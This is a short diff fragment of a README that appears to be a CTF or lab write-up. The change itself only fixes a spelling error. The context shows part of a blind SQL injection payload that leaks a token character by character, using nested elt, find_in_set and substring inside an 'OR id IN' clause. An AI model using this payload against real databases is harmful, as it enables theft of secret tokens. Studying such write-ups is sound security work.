jhector/grading-board/README.md

  OR id IN (<mapping right here>)
 ```

-Here is what the mapping looks like from my exploit (for the first 5 chracters of the token):
+Here is what the mapping looks like from my exploit (for the first 5 characters of the token):
 ```
  OR id IN (
  (select elt((select find_in_set((select substring(token, 1, 1) from tb8210aa9c07bdd4),0x612c622c632c642c652c662c302c312c322c332c342c352c362c372c382c39)),1,2,3,4,5,6,7,8,9,11,12,14,16,17,20,24)),